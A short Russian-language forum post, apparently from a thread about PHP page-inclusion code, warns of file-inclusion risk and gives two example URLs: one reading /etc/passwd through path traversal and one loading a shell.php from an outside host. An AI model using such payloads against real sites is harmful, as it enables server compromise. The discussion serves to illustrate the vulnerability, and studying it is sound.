fffffff
Показать сообщение отдельно
Старый 26.06.2007, 17:27   #11
Товарищ
 
Регистрация: 01.03.2007
Пол: M
Провайдер: АДС ADSL
Сообщений: 315
Поблагодарил: 332
Поблагодарили 160 раз в 80 сообщениях
Открыли хайд :
0 в этом сообщении
4 Всего


По умолчанию

Цитата:
Аккуратнее только с такими конструкциями, ибо таким макаром человек может запросить любую страницу с сервера, например так:
[Для просмотра данной ссылки нужно зарегистрироваться]
А это не есть гут...
Тогда уж
Код:
http://www.adress.ru/index.php?page=../../../../../etc/passwd
или ещё лучше
Код:
http://www.adress.ru/index.php?page=http://megaxeksite.narod.ru/shell.php

Ну в данном случае не катит, я проверял
Spyder вне форума  
Ответить с цитированием